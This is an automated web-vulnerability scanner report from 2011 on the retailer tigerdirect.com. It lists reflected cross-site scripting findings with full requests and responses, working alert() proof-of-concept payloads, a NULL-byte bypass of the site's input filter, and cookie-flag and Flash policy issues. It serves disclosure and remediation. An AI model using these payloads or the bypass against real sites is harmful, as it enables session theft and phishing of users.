XSS, Cross Site Scripting, tigerdirect.com, CWE-79

CAPEC-86, XSs in tigerdirect.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Sun Jan 30 11:14:12 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]

1.2. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]

1.3. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]

1.4. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter]

1.5. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter]

1.6. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [Referer HTTP header]

2. Flash cross-domain policy

3. Cookie without HttpOnly flag set

3.1. http://www.tigerdirect.com/applications/SearchTools/item-details.asp

3.2. http://www.tigerdirect.com/cgi-bin/icart.asp

3.3. http://www.tigerdirect.com/sectors/sweepstakes/asus/asusCoreI7Giveaway_popUnder.asp

3.4. http://www.tigerdirect.com/secure/captcha/Default.aspx

4. Cross-domain Referer leakage

5. Cross-domain script include

6. Email addresses disclosed

7. Robots.txt file

8. HTML does not specify charset

9. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 6 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The value of the EdpNo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 796d4'%3balert(1)//5a2dd2f7153 was submitted in the EdpNo parameter. This input was echoed as 796d4';alert(1)//5a2dd2f7153 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(1)//5a2dd2f7153 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01B
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 02:04:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150A%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150A%2Ejpg&ItemDetailsBeta=Y&msProduct=335878&msRandX=11; path=/
Set-Cookie: SRVR=WEBX10%2D01B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%281%29%2F%2F5a2dd2f7153&Referer=; path=/
Set-Cookie: SessionId=959419320110129210424173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 100869

<!--V2-->
<!-- Your IP is:192.204.11.202-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, n
...[SNIP]...
</a>');
}

function ReviewSort(robj)
{
this.location ='/applications/searchtools/item-details.asp?EdpNo=' +'6532393796d4';alert(1)//5a2dd2f7153'+ '&RSort=' +robj.value+ '&csid=ITD&body=#ReviewStart'
}

//The following 2 functions have to do with the In-store Avail popup div - case 61721
document.onclick = checkClickedElement;
function c
...[SNIP]...

1.2. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The value of the EdpNo request parameter is copied into an HTML comment. The payload %0010a05--><a>cede825acff was submitted in the EdpNo parameter. This input was echoed as 10a05--><a>cede825acff in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /applications/SearchTools/item-details.asp?EdpNo=6532393%0010a05--><a>cede825acff HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA04B
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 02:04:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150A%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150A%2Ejpg&ItemDetailsBeta=Y&msProduct=335878&msRandX=19; path=/
Set-Cookie: SRVR=WEBX11%2D04B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393%250010a05%2D%2D%3E%3Ca%3Ecede825acff&Referer=; path=/
Set-Cookie: SessionId=1384513520110129210427173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 177796

<!--V2-->
<!-- Your IP is:192.204.11.202-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, n
...[SNIP]...
<!--Cart(Landing) :http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393%0010a05--><a>cede825acff-->
...[SNIP]...

1.3. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The value of the EdpNo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003cb51"><a>6308be81e2 was submitted in the EdpNo parameter. This input was echoed as 3cb51"><a>6308be81e2 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /applications/SearchTools/item-details.asp?EdpNo=6532393%003cb51"><a>6308be81e2 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA05A
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 02:04:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=51; path=/
Set-Cookie: SRVR=WEBX12%2D05A; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393%25003cb51%22%3E%3Ca%3E6308be81e2&Referer=; path=/
Set-Cookie: SessionId=3041425620110129210416173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 177793

<!--V2-->
<!-- Your IP is:192.204.11.208-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, n
...[SNIP]...
<input type="hidden" name="url" value="http://www.tigerdirect.com/applications/SearchTools/item-details.asp?page=ty&EdpNo=6532393%003cb51"><a>6308be81e2">
...[SNIP]...

1.4. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload %00bb0c0--><a>d595b8102fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb0c0--><a>d595b8102fc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /applications/SearchTools/item-details.asp?%00bb0c0--><a>d595b8102fc=1 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Length: 100803
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 01:24:24 GMT
Connection: close
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&ItemDetailsBeta=Y&msProduct=1782427&msRandX=83; path=/
Set-Cookie: SRVR=WEBX10%2D08A; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3F%2500bb0c0%2D%2D%3E%3Ca%3Ed595b8102fc%3D1&Referer=; path=/
Set-Cookie: SessionId=4668577920110129202424173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com

<!--V2-->
<!-- Your IP is:96.17.168.193-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, ne
...[SNIP]...
<!--Cart(Landing) :http://www.tigerdirect.com/applications/SearchTools/item-details.asp?%00bb0c0--><a>d595b8102fc=1-->
...[SNIP]...

1.5. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00eb8c3"><a>a3bb50b2646 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb8c3"><a>a3bb50b2646 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /applications/SearchTools/item-details.asp?%00eb8c3"><a>a3bb50b2646=1 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 01:24:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150A%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150A%2Ejpg&ItemDetailsBeta=Y&msProduct=335878&msRandX=32; path=/
Set-Cookie: SRVR=WEBX12%2D12B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3F%2500eb8c3%22%3E%3Ca%3Ea3bb50b2646%3D1&Referer=; path=/
Set-Cookie: SessionId=2063113720110129202415173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 100801

<!--V2-->
<!-- Your IP is:64.215.171.109-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, n
...[SNIP]...
<input type="hidden" name="url" value="http://www.tigerdirect.com/applications/SearchTools/item-details.asp?page=ty&%00eb8c3"><a>a3bb50b2646=1">
...[SNIP]...

1.6. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload cc810--><script>alert(1)</script>429fd582109 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /applications/SearchTools/item-details.asp HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cc810--><script>alert(1)</script>429fd582109

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Length: 100704
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 01:24:47 GMT
Connection: close
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150A%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150A%2Ejpg&ItemDetailsBeta=Y&msProduct=335878&msRandX=3; path=/
Set-Cookie: SRVR=WEBX11%2D09A; path=/
Set-Cookie: SessionId=552337620110129202447173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp&Referer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Dcc810%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E429fd582109&PHRoutine=10; path=/
Set-Cookie: SRCCODE=WEBGOOSFS; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com

<!--V2-->
<!-- Your IP is:96.17.168.193-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, ne
...[SNIP]...
<!--Cart(Referer) :http://www.google.com/search?hl=en&q=cc810--><script>alert(1)</script>429fd582109-->
...[SNIP]...

2. Flash cross-domain policy  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tigerdirect.com

Response

HTTP/1.0 200 OK
Content-Length: 794
Content-Type: text/xml
Last-Modified: Fri, 10 Sep 2010 18:55:14 GMT
Accept-Ranges: bytes
ETag: "38d3bcb31951cb1:4f9"
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:24:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.compusa.com" />
<allow-access-from domain="*.compusa.pr" />
<allow-access-from domain="images.highspeedbackbone.net" />
...[SNIP]...
<allow-access-from domain="retail.tigerdirect.com" />
   <allow-access-from domain="www.tigerdirect.ca" />
<allow-access-from domain="retail.tigertirect.ca" />
   <allow-access-from domain="www.circuitcity.com" />
   <allow-access-from domain="com.puter.tv" />
   <allow-access-from domain="compusa.tv" />
   <allow-access-from domain="pinkfriday.org" />
   <allow-access-from domain="charitypcrace.com" />
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 4 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www.tigerdirect.com/applications/SearchTools/item-details.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /applications/SearchTools/item-details.asp HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Length: 100748
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 01:24:06 GMT
Connection: close
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; path=/
Set-Cookie: SRVR=WEBX10%2D08A; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp&Referer=; path=/
Set-Cookie: SessionId=2683290720110129202406173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com

<!--V2-->
<!-- Your IP is:96.17.168.193-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, ne
...[SNIP]...

3.2. http://www.tigerdirect.com/cgi-bin/icart.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /cgi-bin/icart.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/icart.asp HTTP/1.1
Host: www.tigerdirect.com
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pop%5Fcheck=active; visited=tempyes; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; SRVR=WEBX10%2D07A; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SRCCODE=WEB1101; SSLB=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 29 Jan 2011 15:14:42 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:14:42 GMT
Connection: close
Set-Cookie: SRCCODE=WEB1101; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/
Set-Cookie: SRVR=WEBX12%2D06B; path=/
Content-Length: 1476


<HTML>
<HEAD>
<TITLE>Your TigerDirect.com Shopping Cart</TITLE>
<META NAME="Generator" CONTENT="EditPlus">
<META NAME="Author" CONTENT="">
<META NAME="Keywords" CONTENT="">
<META NAME="Descrip
...[SNIP]...

3.3. http://www.tigerdirect.com/sectors/sweepstakes/asus/asusCoreI7Giveaway_popUnder.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /sectors/sweepstakes/asus/asusCoreI7Giveaway_popUnder.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sectors/sweepstakes/asus/asusCoreI7Giveaway_popUnder.asp HTTP/1.1
Host: www.tigerdirect.com
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
